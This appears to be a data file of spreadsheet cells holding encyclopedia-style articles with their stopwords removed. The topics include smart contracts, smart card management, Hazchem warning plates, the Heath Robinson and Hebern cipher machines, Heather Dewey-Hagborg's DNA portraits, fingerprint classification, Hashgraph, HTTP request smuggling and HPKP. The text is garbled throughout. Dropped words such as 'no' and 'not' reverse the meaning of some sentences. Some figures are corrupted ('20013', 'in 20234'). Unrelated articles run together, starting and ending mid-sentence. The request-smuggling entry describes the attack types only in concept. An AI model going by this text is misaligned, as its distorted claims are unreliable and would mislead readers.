execution codified effects like transfer value parties strictly enforced manipulated, transaction specific contract details stored blockchain distributed ledger. that's actual execution contracts controlled audited platform, arbitrary server-side programs connecting platform.in 2017, implementing decree development digital economy, belarus become first-ever country legalize smart contracts. belarusian lawyer denis aleinikov considered author smart contract legal concept introduced decree.in 2018, senate report said: "while smart contracts might sound new, concept rooted basic contract law. usually, judicial system adjudicates contractual disputes enforces terms, also common another arbitration method, especially international transactions. with smart contracts, program enforces contract built code." number states passed legislation smart contracts, arizona, nevada, tennessee, wyoming. april 2020, iowa's house representatives passed bill legally recognizing smart contracts state.in april 2021, jurisdiction taskforce (ukjt) published digital dispute resolution rules (the digital rules) help enable rapid resolution blockchain crypto legal disputes britain. workings similar transfer value blockchain, deployment smart contract blockchain occurs sending transaction wallet blockchain. transaction includes compiled code smart contract well special receiver address. that transaction must included block added blockchain, point smart contract's code execute establish initial state smart contract. byzantine fault-tolerant algorithms secure smart contract decentralized attempts tamper once smart contract deployed, cannot updated. smart contracts blockchain store arbitrary state execute arbitrary computations. clients interact smart contract transactions. such transactions smart contract invoke smart contracts. these transactions might result changing state sending coins smart contract another account another.the popular blockchain running smart contracts ethereum. ethereum, smart contracts typically written turing-complete programming language called solidity, compiled low-level bytecode executed ethereum virtual machine. halting problem security problems, turing-completeness considered risk deliberately avoided languages like vyper. some smart contract programming languages missing turing-completeness simplicity, scilla, bitcoin script. however, measurements using regular expressions showed 35.3% 53,757 ethereum smart contracts included recursions loops constructs connected halting problem.several languages designed enable formal verification: bamboo, iele, simplicity, michelson (can verified coq), liquidity (compiles michelson), scilla, daml pact. processes blockchain generally deterministic order ensure byzantine fault-tolerance. nevertheless, real world application smart contracts, lotteries casinos, require secure randomness. fact, blockchain technology reduces costs conducting lottery therefore beneficial participants. randomness blockchain implemented using block hashes timestamps, oracles, commitment schemes, special smart contracts like randao quanta well sequences mixed strategy nash equilibria. applications 1998, szabo proposed smart contract infrastructure implemented replicated asset registries contract execution using cryptographic hash chains byzantine fault-tolerant replication. askemos implemented approach 2002 using scheme (later adding sqlite) contract script language.one proposal using bitcoin replicated asset registration contract execution called "colored coins". replicated titles potentially arbitrary forms property, along replicated contract execution, implemented different projects. 2015, experimenting "smart bonds" bitcoin blockchainin payment streams could hypothetically fully automated, creating self-paying instrument.inheritance wishes could hypothetically implemented automatically upon registration death certificate means smart contracts. birth certificates also work together smart contracts.chris snook inc.com suggests smart contracts could also used handle real estate transactions could used field title records public register.seth oranburg liya palagashvili argue smart contracts could also used employment contracts, especially temporary employment contracts, according would benefit employer. security issues blockchain-based smart contract visible users said blockchain. however, leads situation bugs, including security holes, visible quickly fixed. such attack, difficult quickly, successfully executed june 2016, draining approximately us$50 million worth ether time, developers attempted come solution would gain consensus. program time delay place hacker could remove funds; hard fork ethereum software done claw back funds attacker time limit expired. other high-profile attacks include parity multisignature wallet attacks, integer underflow/overflow attack (2018), totaling us$184 million.issues ethereum smart contracts, particular, include ambiguities easy-but-insecure constructs contract language solidity, compiler bugs, ethereum virtual machine bugs, attacks blockchain network, immutability bugs central source documenting known vulnerabilities, attacks problematic constructs. difference smart legal contracts smart legal contracts distinct smart contracts. mentioned above, smart contract necessarily legally enforceable contract. hand, smart legal contract elements legally enforceable contract jurisdiction enforced enforced court tribunal. therefore, every smart legal contract contain elements smart contract, every smart contract smart legal contract.there formal definition smart legal contract legal industry.a ricardian contract type smart legal contract. also code other laws cyberspace decentralized application ethereum regulation algorithms regulation algorithms ricardian contract design pattern capture intent agreement parties) loan secure multiparty computation transparency references</t>
  </si>
  <si>
    <t>Smart card management system</t>
  </si>
  <si>
    <t>smart card management system (scms) credential management system (cms) system managing smart cards life cycle smart cards. thus, system issue smart cards, maintain smart cards finally take smart cards (eol). chip/smart cards provide foundation secure electronic identity, used control access facilities, networks computers. smart cards security credentials authenticating smart card holder (for example using two-factor authentication) security requirements smart card management system often high therefore vendors systems found computer security industry. smart card management systems generally implemented software applications. system needs accessible operator user simultaneously (this normally case) software application often provided form server application accessible several different client systems. alternative approach multiple synchronized systems. smart card management systems connect smart cards systems. which systems smart card management system must connect depends case smart cards. typical systems connect include: connected smart card reader unconnected (rfid) smart card reader card printer user directory certificate authority hardware security module physical access control systemsduring smart card lifecycle, smart card changing state (examples states include issued, blocked revoked), process taking smart card state another, main responsibility smart card management system. different smart card management systems call processes different names. below list widely used names processes listed briefly explained: register adding smart card smart card management system issue issuing personalizing smart card smart card holder initiate activating smart card first smart card holder deactivate putting smart card hold backend system activate reactivating smart card deactivated state lock also called block; smart card holder access smart card possible unlock also called unblock; smart card holder access smart card re-enabled revoke credentials smart card made invalid retire smart card disconnected smart card holder delete smart card permanently removed system unregister smart card removed system (but could potentially reused) backup backup smart card certificates selected keys restore restore smart card certificates selected keys notes references schneier, bruce (1996). "applied cryptography," john wiley sons inc. rankl, wolfgang effing, wolfgang (2003). "smart card handbook," john wiley sons wilson, chuck (2001). "get smart," mullaney publishing group hansche, susan berti, john hare chris (2004). "official (isc)2 guide cissp exam," auberbach publications smart card industry glossary smart card alliance</t>
  </si>
  <si>
    <t>Hazchem</t>
  </si>
  <si>
    <t>hazchem hazardous chemicals) warning plate system used australia, malaysia, zealand, india united kingdom vehicles transporting hazardous substances, storage facilities. top-left section plate gives emergency action code (eac) telling fire brigade actions take there's accident fire. middle-left section containing digit number gives substance identification number describing material. lower-left section gives telephone number called special advice needed. warning symbol right indicates general hazard class material. bottom-right plate carries company logo name. there also standard null hazchem plate indicate transport non-hazardous substances. null plate include substance identification. national chemical emergency centre (ncec) united kingdom provides free online hazchem guide. emergency action code emergency action code (eac) three character code displayed dangerous goods classed carriers, provides quick assessment first responders emergency responders (i.e. fire fighters police) actions take carrier carrying goods become involved incident (traffic collision, example). eac's characterised single number either letters (depending hazard). ncec commissioned department communities local government (clg) edit list 2013 publication, outlining application hazchem emergency actions codes (eacs) britain 2013. dangerous goods emergency action code (eac) list reviewed every years essential compliance document emergency services, local government control planning for, prevention emergencies involving dangerous goods. current list 20013. ncec heart system since inception early 1970s, publishing list behalf government 1996 resuming management 2008. printed version book purchased directly (isbn 9780117541184) downloaded file ncec’s website. hazchem fire suppression number leading indicates type fire-suppressing agent used prevent extinguish fire caused chemical. these indicators used product documentation displayed vehicle plates respectively. system ranks suppression media order suitability, fire fought suppression medium equal higher number. example, chemical number indicating water fought additionally media (foam) (dry agent), (coarse spray). this especially important chemicals requiring medium (dry agent), chemicals react violently water using lowered-number media actively dangerous. hazchem safety parameters each contains least letter, determines category chemical falls under, also highlights violence chemical (i.e. likelihood spontaneously combust, explode etc.), personal protective equipment working around chemical action take disposing chemical. each category assigned letter determine actions required handling, containing disposing chemical question. eight 'major categories' exist commonly denoted black letter white background. four subcategories exist specifically deal type personal protective equipment responders must wear handling emergency, denoted white letter black background. australia update australian dangerous goods code volume 2010, white letter black background removed, making (breathing apparatus) requirement large incidents regardless whether substance involved fire. category classed violent, means chemical violently explosively reactive, either atmosphere water, (which could marked dangerous symbol). protection divided three categories personal protective equipment, full, fire only. full denotes full personal protective equipment provisions must used around contact chemical, usually include portable breathing apparatus water tight chemical proof suit. (acronym breathing apparatus) specifies portable breathing apparatus must used times around chemical, fire specifies breathing apparatus necessary short exposure periods chemical required chemical alight. fire denoted within emergency action code white letter black background, black letter white background denotes breathing apparatus times. when changing background colour possible (such handwriting), brackets means black background. "3[y]e" means white letter black background. substance control specifies chemical event spill, either dilute contain. dilute means chemical washed drain large quantities water. contain requires spillage must come contact drains water courses. event chemical incident, specify evacuation necessary chemical poses public hazard extend beyond immediate vicinity. evacuation possible, advice stay doors secure points ventilation necessary. this condition denoted emergency action code. optional letter, depending nature chemical. examples commonly displayed example petrol tankers. this means fire must fought using foam agent small fire), react violently explosive, fire fighters must wear portable breathing apparatus times, white black fire, run-off needs contained. also indicates incident controller evacuation surrounding area necessary. calculation hazchem action code multi-loads sites multiple hazchem codes example:there three substances carried multi-load, emergency action codes 4we. character (number): first character three substances highest number must taken first character code multi-load therefore first character bullet assigned mixed load eacs include bullet. character (letter): second character three substances taking along chart along left hand column, intersection therefore character first substances would this resultant character taken along character third substance taken along left hand column. intersection point second character code three substances therefore letter ‘e’: third substance third character therefore multi-load must also ‘e’. resultant hazchem code three substances carried multi-load therefore 4we. also hazmat nfpa 704—the equivalent system marking presence dangerous goods buildings fixed storage tanks united states, intended emergency services. adr—the equivalent system used identifying dangerous goods transported mainland europe. globally harmonized system classification labelling chemicals—a international standard marking hazardous materials. hazardous materials identification system—a system marking dangerous materials united states, intended workers. references external links ncec dangerous goods emergency action list 2017 list 2013 example hazchem panel hazchem emergency action code (eac) general 'hazchem information emergency services' site dangerous goods emergency action code list dangerous goods-hazmat group, yahoo-hosted global network discussion dangerous goods hazardous materials storage handling issues.</t>
  </si>
  <si>
    <t>Heath Robinson (codebreaking machine)</t>
  </si>
  <si>
    <t>heath robinson machine used british codebreakers government code cypher school (gc&amp;cs) bletchley park world cryptanalysis lorenz cipher. this achieved decryption messages german teleprinter cipher produced lorenz sz40/42 in-line cipher machine. both cipher machines called "tunny" codebreakers, named different german teleprinter ciphers fish. mainly electro-mechanical machine, containing couple dozen valves (vacuum tubes), predecessor electronic colossus computer. dubbed "heath robinson" wrens operated cartoonist william heath robinson, drew immensely complicated mechanical devices simple tasks, similar (and somewhat predating) rube goldberg u.s.the functional specification machine produced newman. main engineering design work frank morrell post office research station dollis hill north london, colleague tommy flowers designing "combining unit". wynn-williams telecommunications research establishment malvern produced high-speed electronic valve relay counters. construction started january 1943, prototype machine delivered bletchley park june first used help read current encrypted traffic soon afterwards.as robinson slow unreliable, later replaced colossus computer many purposes, including methods used twelve-rotor lorenz sz42 on-line teleprinter cipher machine (code named tunny, tunafish). tutte's statistical method basis method heath robinson machine implemented bill tutte's "1+2 technique". this involved examining first five impulses characters message ciphertext tape combining first impulses part generated {\displaystyle \chi wheels lorenz machine. this involved reading long loops paper tape, containing ciphertext {\displaystyle \chi component key. making tape character longer message tape, 1271 starting position {\displaystyle \chi {\displaystyle \chi sequence tried message. count amassed start position and, exceeded pre-defined "set total", printed out. highest count likely correct values {\displaystyle \chi {\displaystyle \chi with values, settings {\displaystyle \chi wheels could tried break five {\displaystyle \chi wheel starting positions message. this allowed effect {\displaystyle \chi component removed resulting modified message attacked manual methods testery. tape transport "bedstead" system pulleys around continuous loops tape driven synchrony. initially means pair sprocket wheels common axle. this changed drive friction pulleys sprocket wheels maintaining synchrony found caused less damage tapes. speeds 2000 characters second achieved shorter tapes, 1000 longer tapes. tapes guided past array photo-electric cells characters signals read. possible tape lengths bedstead 2000 11,000 characters. tape reading perforated tapes read photo-electrically "gate" placed near possible sprocket reduce effect stretched tapes. successive characters tape read battery photocells, eleventh sprocket holes additional ones "stop" "start" signals hand-punched third fourth fourth fifth channels. combining unit this designed tommy flowers post office research station dollis hill north london. used thermionic valves (vacuum tubes) implement logic. this involved boolean "exclusive (xor) function combining various bit-streams. following "truth table", represents "true" represents "false". bletchley park known respectively.) other names function are: "not equal" (neq), "modulo addition" (without carry) "modulo subtraction" (without 'borrow'). note modulo addition subtraction identical. some descriptions tunny decryption refer addition differencing, i.e. subtraction, mean thing. combining unit implemented logic tutte's statistical method. this required paper tape containing ciphertext tried tape contained component lorenz cipher machine generated relevant wheels possible starting positions. count made total number generated, high count indicating greater probability starting position sequence correct. counting wynn-williams obtained cambridge university work cavendish laboratory ernest rutherford. 1926 constructed amplifier using thermionic valves (vacuum tubes) small electrical currents arising detectors nuclear disintegration experiments. rutherford devote attention construction reliable valve amplifier methods registering counting particles. counter used gas-filled thyratron tubes bi-stable devices. counters wynn-williams designed heath robinson, subsequently colossus computers used thyratrons count units high speed relays count units slower relays count 160, 240, 320, 400, 800, 1200, 1600, 2000, 4000, 6000, 8000. count obtained run-through message tape compared pre-set value, exceeded displayed along count indicated position tape relation message tape. wren operators initially write numbers next count exceeded threshold displayed fruitful source error", printer soon introduced. robinson developments original heath robinson prototype effective despite number serious shortcomings. these, lack "spanning" ability, progressively overcome development became known "old robinson". however, tommy flowers realised could produce machine generated stream electronically main problem keeping tapes synchronised would eliminated. this genesis colossus computer. despite success colossus, robinson approach still valuable certain problems. improved versions developed, nicknamed peter robinson robinson cleaver department stores london. development ideas machine called super robinson super rob. designed tommy flowers, four bedsteads allow running four tapes used running depths "cribs" known-plaintext attack runs. references notes bibliography</t>
  </si>
  <si>
    <t>Heather Dewey-Hagborg</t>
  </si>
  <si>
    <t>heather dewey-hagborg (born june 1982, philadelphia, pennsylvania) information artist bio-hacker. best known project stranger visions, series portraits created recovered discarded items, hair, cigarettes chewing living brooklyn, york. from extracted dna, determined gender, ethnicity factors used face-generating software printer create speculative, algorithmically determined portrait. while critical technology surveillance, work also noted provocative lack legal precedent. education dewey-hagborg information artist whose works explore intersection science. student information arts program bennington college, participated computer science classes, laid groundwork science-based artwork would later envision using algorithms, electronics, computer programming. earned bachelor arts (b.a.) degree 2003. dewey-hagborg continued refining work artist computer programmer, studying artificial intelligence, obtaining master professional studies (m.p.s.) interactive telecommunications york university (nyu) 2007. curated robotic performance show called robots march! march 2005, exhibited piece called lighter air: experiment constructing autonomous flying robot.as final project nyu, dewey-hagborg explored question "can computers creative?" exhibit called spurious memories. developed autonomous face categorizing generating software program recognized facial components, made comparisons adjustments, produced unique representations human face mass exposure facial images. dewey-hagborg continued education rensselaer polytechnic institute graduated electronic arts 2016. educator areas interest include technology, multimedia, digital photography, research-based programming, computer science. dewey-hagborg worked teaching assistant rensselaer polytechnic institute, adjunct professor nyu's interactive telecommunications program, adjunct professor nyu's courant institute mathematical sciences, taught technology studies school institute chicago.as august 2019, dewey-hagborg lives works dhabi, visiting assistant professor interactive media dhabi. courses include communication technology, understanding interactive media, bioart practices. projects totem dewey-hagborg's totem (2010) site-specific multimedia sculpture characterizing earlier work. totem, idol, designed explore implications language artificial intelligence using machine learning technology. exploiting audio surveillance techniques eavesdrop record conversations installation site, dewey-hagborg wrote algorithms isolate word sequences grammatical structures commonly used units. influenced hebbian theory, programmed sculpture's computer generate speech based frequently occurring language structures given recording period. over time, least frequently elicited words units would fade dropped sculpture's spoken vocabulary. remaining units, stored sculpture's memory, spoken random intervals.martha schwendener, york times, wrote totem showed promise, but, audio difficulties fragmented, randomly generated speech, piece "failed connect human speech, meaning, technology profound fashion." stranger visions stranger visions (2012–2013) science-based, artistic exploration using starting point lifelike, computer generated portraits.she began project questioning much information could understood person using genetic detritus left behind strangers york city. really struck idea things make human hair, skin, saliva, fingernails become real liability constantly shed public. anyone could come along mine information." hoped, producing realistic sculptures anonymous people using clues dna, spark debate potential misuse profiling, privacy, genetic surveillance. part research stranger visions, took three-week crash-course biotechnology genspace laboratory york learned significant amount personal information amateur biologist could learn someone biotech processes.she began process extracting samples collected. extraction involves treating hair sample, example, dissolves hair, primer specifically developed help locate characteristics like color gender along genome. might repeat process times, looking genetic variants influencing traits like color, hair color, racial ancestry, order complete portrait.once strands extracted samples, amplifies, copies, specific regions genome, using technique called polymerase chain reaction, pcr, process advanced kary mullis, winner nobel prize chemistry (1993). these amplified regions genome make possible identifying single nucleotide polymorphisms, snps (pronounced "snips"), contain variables base pairs give clues person's individual genetic make (e.g., whether person's eyes might blue, brown green). these results sent analysis company sequencing. used 23andme, analysis service, stranger visions. genetic blueprint receives return text file full coded information identifying unique positioning nucleobases adenine, thymine, cytosine, guanine, make sections genome interested this data entered customized computer program wrote. program interprets code provides list traits, including propensity obesity, color, hair color, hair curl, skin tone, freckles, gender. takes traits, many enters face-generating program configure portraits. previous experience facial recognition algorithms gave ability repurpose existing facial recognition program, basel, switzerland. reworked program generate faces instead recognizing facial features. resulting model changes facial dimensions (e.g., width nose mouth) characteristics genetic information receives. before making final print, generates several different versions face, finally choosing finds aesthetically pleasing.critics dewey-hagborg's stranger visions question whether work crosses ethical legal boundaries. they make distinction artist's right express societal concerns artwork collecting personal, genetic information without informed consent. fact samples regularly "left behind" abandoned mean people relinquished right decide information used.some laws, like human tissue 2004 united kingdom, prohibit private individuals collecting biological samples analysis. what laws exist regulate collection samples united states consistent among states rarely address private sector. only states, like york, outlaw testing without written consent. others worry misuse information, fearing discrimination based existing medical mental health issues predisposition disease-related illnesses "unreasonable" searches evidence enforcement. scientist gallery, according dewey-hagborg, turned proposal fearing project would "cause fright" among people.other critics focus growing do-it-yourself biohacking movement. supporters like genspace's ellen jorgensen claim projects like stranger visions engage public make technology accessible. detractors fear unintended unexpected consequences unregulated experiments conducted d.i.y. amateur biologists developed non-traditional laboratory settings.still others, including daniel macarthur, assistant professor harvard medical school, john hawks, anthropologist university wisconsin-madison, michelle meyer, academic fellow petrie-flom center health policy, biotechnology bioethics harvard medical school, arthur caplan, phd, director division medical ethics, n.y.u., report technological capability construct accurate likeness human face based evidence currently available.although possible identify certain genetic markers linked facial structures, scientists isolate genes variations needed produce accurate likeness computer simulation. meyer, analyzed data dewey-hagborg's website concludes: tell, working sex; ancestral groups usually broad, event reflects half individual's (from presumably guesses hair color texture bone structure); decent guess color. there hundreds thousands least) people would descriptions even phenotype predictions accurate, many cases, predictions probably going wrong. environment, probabilistic nature interpreting data collected, limitations computer technology influence outcome. likens work sketch artist. most, portraits bear vague, family resemblance people whose genetic information used foundation portraits.stranger visions view exhibition mutations-créations imprimer monde permanent collection centre pompidou paris, france. public version genetic profiling code available github. 2013, dewey-hagborg contacted assistant medical examiner delaware, result work stranger visions. project involved developing portrait unidentified woman whose case remained unsolved years. agreed adviser assist case. though resulting portrait based unidentified woman's could accurate existing technology allowed, leaving room speculation, dewey-hagborg viewed working case potential type face-generating technology. anything description, increase possibility loved ones find even little think worth it." critics dewey-hagborg's involvement delaware case express concern call "d.i.y. forensic science" question role civilians state investigations. invisible dewey-hagborg's work stranger visions interest issues surrounding genetic surveillance lead development products whose purpose eliminate traces. first, erase, bleaching spray cleans surfaces (e.g., cups, silverware) evidence. second, replace, spray consisting blend genes designed introduce foreign evidence surface, therefore masking original remaining area. dewey-hagborg views "citizens' defense looming surveillance state." collaboration chelsea manning summer 2017 dewey-hagborg's collaborative exhibition transgender activist chelsea manning becoming resemblance opened fridman gallery york city, curated roddy schrock. exhibition, dewey-hagborg created printed portraits manning, based cheek swabs hair clippings manning sent incarcerated leaking classified information wikileaks. dewey-hagborg created probably chelsea, portraits based manning's maternal dna, variances skin color features presents malleability data, radical love, portraits many manning selected best conveyed appearance time gender transition within maximum security prison, allow photography. installation demonstrated much human genome interpretation condensed subjectively interpreted." probably chelsea since traveled numerous institutions exhibition, including transmediale 2018: face value, january–april 2018 berlin, space, genomic intimacy, may–july 2018 eindhoven, netherlands perth institute contemporary art, hyperprometheus, october–december, 2018.probably chelsea permanent museum collection exploratorium francisco, california. radical love view permanent collections york historical society victoria albert museum london. additional exhibitions events dewey-hagborg's work exhibited monitor digital festival guadalajara, mexico, moma, long island city, york, york public library york city, science gallery trinity college dublin, ireland, gallery sydney, australia, jaaga technology center bangalore, india, museum boijmans rotterdam, netherlands, electronica center linz, austria.dewey-hagborg also produced following selected works: trace recordings: surveillance identity 21st century gallery, ultimo nsw, australia cyber securities, pepco edison place gallery, washington, d.c. plugged interactive electronic media, grounds sculpture, domestic arts building, hamilton township, mercer county, jersey. dust (with paul hazelton), gallery, east hampton, york. unlanguage (with adriana varella), computer interactive installation, poland mediations bienniale, zamek castle, poland. open circuit, moma, long island city, york. jaaga dhvani, sound art, bangalore, india selected grants awards 2008 artist's residency grant, sculpture space, utica, york. 2012 residency eyebeam 2012 artist's residency jerome foundation grant, clocktower gallery, manhattan, n.y. 2013 vida 15.0 artificial life international awards, special mention 2016 creative capital award 2019 technology award, "probably chelsea", zebrastraat ghent, belgium. gallery also parabon nanolabs, utilizes similar technique forensic artwork references external links stranger visions</t>
  </si>
  <si>
    <t>Hebern rotor machine</t>
  </si>
  <si>
    <t>hebern rotor machine electro-mechanical encryption machine built combining mechanical parts standard typewriter electrical parts electric typewriter, connecting scrambler. first example (though barely) class machines known rotor machines would become primary form encryption world time after, included famous examples german enigma. history edward hugh hebern building contractor jailed 1908 stealing horse. claimed that, time hands, started thinking problem encryption, eventually devised means mechanizing process typewriter. filed first patent application cryptographic machine (not rotor machine) 1912. time funds able spend time working device, continued produce designs. hebern made first drawings rotor-based machine 1917, 1918 built model 1921 applied patent issued 1924. continued make improvements, adding rotors. agnes driscoll, chief civilian employee navy's cryptography operation (later become op-20-g) wwii, spent time working hebern returning washington op-20-g mid-'20s. hebern convinced future success system formed hebern electric code company money several investors. over next years repeatedly tried sell machines navy army, well commercial interests banks. none terribly interested, time cryptography widely considered important outside governments. probably william friedman's confidential analysis hebern machine's weaknesses (substantial, though repairable) sales government limited; hebern never told them. perhaps best indication general distaste matters statement henry stimson memoirs "gentlemen read other's mail." stimson, secretary state hoover, withdrew state department support herbert yardley's american black chamber, leading closing. eventually investors patience, sued hebern stock manipulation. spent another brief period jail, never gave idea machine. 1931 navy finally purchased several systems, real sale. there three patents rotor machines issued 1919, several rotor machines designed independently time. successful widely used enigma machine. description hebern design disk electrical contacts either side, known today rotor. linking contacts either side rotor wires, letter side wired another side random fashion. wiring encoded single substitution alphabet. when user pressed typewriter keyboard, small amount current battery flowed contacts input side disk, wiring, back different contact. power operated mechanicals electric typewriter type encrypted letter, alternately simply bulb paper tape punch teletype machine. normally system would better single-alphabet systems 16th century. however rotor hebern machine geared keyboard typewriter, every keypress, rotor turned substitution alphabet thus changed slightly. this turns basic substitution polyalphabetic similar well known vigenère cipher, exception required manual lookup keys cyphertext. operators simply turned rotor pre-chosen starting position started typing. decrypt message, turned rotor around socket "backwards", thus reversing substitutions. they typed ciphertext came plaintext. better yet, several rotors placed output first connected input next. case first rotor operates before, turning keypress. additional rotors spun beside turned position beside rotates full turn. number alphabets increases dramatically. rotor letters alphabet, five rotors "stacked" fashion allows 11,881,376 different possible substitutions. william friedman attacked hebern machine soon came market 1920s. quickly "solved" machine built similar hebern, rotors stacked rotor turning keypress, so-called fast rotor. cases resulting ciphertext consisted series single-substitution cyphers, letters long. showed fairly standard techniques could used systems, given enough effort. course, fact great secret. this explain army navy unwilling hebern's design, much surprise. references external links hebern code machines</t>
  </si>
  <si>
    <t>Henry Classification System</t>
  </si>
  <si>
    <t>henry classification system long-standing method fingerprints sorted physiological characteristics one-to-many searching. developed chandra bose, qazi azizul haque edward henry late 19th century criminal investigations british india, basis modern-day afis (automated fingerprint identification system) classification methods 1990s. recent years, henry classification system generally replaced ridge flow classification approaches. history development although fingerprint characteristics studied back mid-1600s, fingerprints means identification occur mid-19th century. roughly 1859, william james herschel discovered fingerprints remain stable time unique across individuals; chief magistrate hooghly district jungipoor, india, 1877 first institute fingerprints handprints means identification, signing legal documents, authenticating transactions. fingerprint records collected time used one-to-one verification only; means records would logically filed searched invented. 1880, henry faulds wrote charles darwin, explaining system classifying fingerprints, asking assistance development. darwin unable assist faulds, agreed forward letter cousin, francis galton. henry faulds francis galton engage much correspondence, following decade, devised similar fingerprint classification systems. unclear credit classification system. however, know henry faulds first european publish notion scientific fingerprints identification criminals. 1892, francis galton published highly influential book, finger prints described classification system include three main fingerprint patterns loops, whorls arches. time, alternative fingerprints bertillonage, also known anthropometry. developed alphonse bertillon 1879, bertillonage consists meticulous method measuring body parts identifying criminals. 1892, british indian police force adopted anthropometry. years later, edward henry, inspector general bengal police india became interested fingerprints criminal identification. influenced galton's finger prints, corresponded regularly 1894; january 1896, henry ordered bengali police collect prisoners’ fingerprints addition anthropometric measurements. expanding galton's classification system, developed henry classification system years 1896 1925. primarily assisted qazi azizul haque developed mathematical formula supplement henry's idea sorting 1024 pigeon holes based fingerprint patterns, chandra bose. both, recommendation henry, received recognition years later british government contribution. henry classification system find worldwide acceptance 1899. 1897 commission established compare anthropometry henry classification system. results overwhelmingly favor fingerprints, fingerprinting introduced british india governor general, 1900, replaced anthropometry. also 1900, henry sent natal, south africa assist reorganization local police force establish fingerprint bureau. efforts south africa highly successful; 1901 edward henry returned britain appointed assistant commissioner scotland yard, head criminal investigation department (cid). year, first fingerprint bureau established scotland yard. (harling 1996) (met) (early) explanation henry classification system allows logical categorization ten-print fingerprint records primary groupings based fingerprint pattern types. this system reduces effort necessary search large numbers fingerprint records classifying fingerprint records according gross physiological characteristics. subsequent searches (manual automated) utilizing granular characteristics minutiae greatly simplified. henry classification system method classify fingerprints exclude potential candidates. this system never used individualization. henry classification system assigns finger number according order located hand, beginning right thumb number ending left pinky number system also assigns numerical value fingers contain whorl pattern; fingers value fingers value fingers value fingers value final fingers value fingers non-whorl pattern, arch loop pattern, value zero. even finger value calculated placed numerator fraction. finger values placed denominator. value added whorls maximum obtainable either side fraction thus, primary classification fraction 32/32, would indicate whorl patterns 32/32 would mean fingers whorl patterns.example henry classification: plus 34edg key- ridge count first loop major- value ridge counts tracings fingers primary- summation value whorl type patterns fingers (#2, numerator), (#1, denominator); value fingers whorls: (16), (8), (4), (2), (1); plus numerator denominator. secondary- pattern types fingers ulna loop, radial loop, whorl, arch sub-secondary- value ridge counts tracing- fingers numerator; denominator. final- ridge count loops whorls little fingers expressed numbers. right little used numerator left little denominator. loop appears finger whorl other, enumerate ridge counts treating whorl ulnar loop. impact current biometric systems henry classification system highly influential force formation current iafis technology (integrated automated fingerprint identification system). when iafis solutions attempted emulate henry process. mid-1990s, unusual state city continue maintain physical file henry-sorted fingerprint cards case disaster occurred iafis. processing speeds, network throughput capacities, system reliability increased, longer necessary automated fingerprint matching mirror manual processes. iafis began classify fingerprints according distance core delta, minutiae locations, pattern type, latter based henry classification system. presently, forensic avis solutions (e.g. state local) still employ henry classification system based manual fingerprint filing. however, legacy systems, henry classification system essential automated systems. (carlton)in 20234 references external links henry classification system javascript implementation henry classification http://www.correctionhistory.org/html/chronicl/dcjs/html/nyidbur2.html</t>
  </si>
  <si>
    <t>Slock.it</t>
  </si>
  <si>
    <t>Hashgraph</t>
  </si>
  <si>
    <t>hashgraph distributed ledger technology described alternative blockchains. hashgraph technology currently patented, authorized ledger hedera hashgraph. native cryptocurrency hedera hashgraph system hbar. unlike blockchains, hashgraphs bundle data blocks miners validate transactions. instead, hashgraphs "gossip gossip" protocol individual nodes network "gossip" transactions create directed acyclic graphs time-sequence transactions. each "gossip" message contains transactions plus timestamp, digital signature, cryptographic hashes earlier events. this makes hashgraph form asynchronous byzantine fault-tolerant (abft) consensus algorithm.hashgraph invented mid-2010s american computer scientist leemon baird. baird co-founder chief technical officer swirlds, company holds patents covering hashgraph algorithm. concept hashgraph described continuation successor blockchain concept, provides increased speed, fairness, cost, security constraints. hedera white paper co-authored baird explained round, node calculates shared state processing transactions received round before," "digitally signs hash shared state, puts transaction, gossips community." hedera hashgraph hedera hashgraph public distributed ledger based hashgraph algorithm. hedera hashgraph developed company name, hedera, based dallas, texas. hedera founded hashgraph inventor leemon baird business partner mance harmon, exclusive license hashgraph patents held company, swirlds. hedera owned managed "governing council" global companies entities. council's members include swirlds, well google, boeing, ibm, deutsche telekom, tata communications, électricité france, fis, university college london, london school economics, piper, shinhan bank, standard bank, servicenow, ubisoft, several others.the hedera governing council voted purchase patent rights hashgraph make algorithm open source apache license 2022. criticism claimed hashgraphs less technically constrained blockchains proper. cornell professor emin sirer notes "the correctness entire hashgraph protocol seems hinge every participant knowing agreeing upon total number participants system," difficult number determine open distributed system." baird responded "all nodes given time know many nodes are." hashgraph developer time noted "...a node joining network transaction like gets assigned consensus timestamp, point nodes include consensus." references</t>
  </si>
  <si>
    <t>Hermes8</t>
  </si>
  <si>
    <t>cryptography, hermes8 name stream cypher algorithm designed ulrich kaiser. submitted estream project ecrypt network. classified 'archive' algorithm considered. security paper analysis hermes8 stream ciphers" authors claim, attack latest version cipher (hermes8f), requires known keystream bytes recovers cipher's secret less second normal pc'. references analysis hermes8 stream ciphers" paper steve babbage</t>
  </si>
  <si>
    <t>HTTP request smuggling</t>
  </si>
  <si>
    <t>http request smuggling security exploit http protocol uses inconsistency interpretation content-length and/or transfer-encoding headers http server implementations http proxy server chain. first documented 2005 linhart types cl.te type http request smuggling, front processes request using content-length header backend processes request using transfer-encoding header. te.cl type http request smuggling, front processes request using transfer-encoding header backend processes request using content-length header. te.te type http request smuggling, front backend process request using transfer-encoding header, header obfuscated (for example nonstandard whitespace formatting duplicate headers) makes servers ignore prevention http/2 vulnerable request smuggling attacks uses different method determining length request. another method avoiding attack frontend server normalize http requests passing backend, ensuring interpreted way. references</t>
  </si>
  <si>
    <t>HTTP Public Key Pinning</t>
  </si>
  <si>
    <t>http public pinning (hpkp) obsolete internet security mechanism delivered http header allows https websites resist impersonation attackers using misissued otherwise fraudulent digital certificates. server uses deliver client (e.g. browser) hashes public keys must appear certificate chain future connections domain name. example, attackers might compromise certificate authority, mis-issue certificates origin. combat risk, https server serves list “pinned” public hashes valid given time; subsequent connections, validity time, clients expect server public keys certificate chain. not, error message shown, cannot (easily) bypassed user. technique certificates, public hashes. this means pair certificate certificate authority, access private key. also user public keys root intermediate certificates (created certificate authorities), restricting site certificates issued said certificate authority. hpkp mechanism complexity possibility accidental misuse, browsers deprecated removed hpkp support favor certificate transparency expect-ct header. certificate authority authorization also used restrict certificate authorities issue certificates particular domain, thus reducing chance certificate issue errors. mechanism server communicates hpkp policy user agent http response header field named public-key-pins public-key-pins-report-only reporting-only purposes). hpkp policy specifies hashes subject public info certificates website's authentic x.509 public certificate chain (and least backup key) pin-sha256 directives, period time user agent shall enforce public pinning max-age directive, optional includesubdomains directive include subdomains domain sent header) pinning policy optional report-uri directive send pinning violation reports. least public keys certificates certificate chain needs match pinned public order chain considered valid user agent. time publishing, 7469 allowed sha-256 hash algorithm. (appendix 7469 mentions tools required arguments used produce hashes hpkp policies.) website operator choose either root certificate public particular root certificate authority, allowing certificate authority (and intermediate authorities signed key) issue valid certificates website's 